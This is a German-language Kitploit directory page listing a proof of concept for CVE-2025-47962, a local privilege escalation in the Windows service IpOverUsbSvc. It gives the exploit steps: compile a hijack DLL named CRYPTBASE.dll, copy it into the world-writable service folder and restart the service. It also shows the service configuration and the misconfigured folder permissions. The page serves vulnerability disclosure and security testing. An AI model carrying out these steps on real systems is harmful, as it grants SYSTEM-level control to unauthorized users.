Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-47962-POC — Proof-of-concept für CVE-2025-47962, das lokale Privilegienerweiterung über DLL-Hijacking im Windows-Dienst IpOverUsbSvc aufgrund unsicherer Verzeichnisberechtigungen demonstriert. | Kitploit
Tools/GitHubGitHub/q1uf3ng/cve-2025-47962-poc
Privilege EscalationSchwachstellenanalyseExploitationLaterale BewegungBinary-Exploitation
GitHubq1uf3ng/cve-2025-47962-poc

CVE-2025-47962-POC

Proof-of-concept für CVE-2025-47962, das lokale Privilegienerweiterung über DLL-Hijacking im Windows-Dienst IpOverUsbSvc aufgrund unsicherer Verzeichnisberechtigungen demonstriert.

Repository anzeigen
41vor 8 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-47962-POC

Reproduktionsprozess: i686-w64-mingw32-gcc -shared -o CRYPTBASE.dll poc.c -lkernel32

copy CRYPTBASE.dll "C:\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\CRYPTBASE.dll"

net stop IpOverUsbSvc net start IpOverUsbSvc Bild

Erklärung: IpOverUsbSvc

root@kitploit:~

SERVICE_NAME: IpOverUsbSvc
TYPE               : 10  WIN32_OWN_PROCESS
START_TYPE         : 2   AUTO_START
BINARY_PATH_NAME   : "C:\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe"
SERVICE_START_NAME : LocalSystem

Läuft mit LocalSystem-Berechtigungen. Die ausführbare Datei befindet sich im Verzeichnis C:\Microsoft Shared, über das Standardbenutzer volle Kontrollberechtigungen besitzen. Es wurde festgestellt, dass normale Benutzer Dateien in das SYSTEM-Dienstverzeichnis schreiben können. Dann überwachen Sie die DLL Bild Bild Bild

Die Berechtigungen für das während der Windows-SDK-Installation erstellte Verzeichnis C:\Microsoft Shared\ sind falsch konfiguriert:

root@kitploit:~
C:\Microsoft Shared BUILTIN\Users:(I)(OI)(CI)(F)
                    NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(M)
Tool herunterladen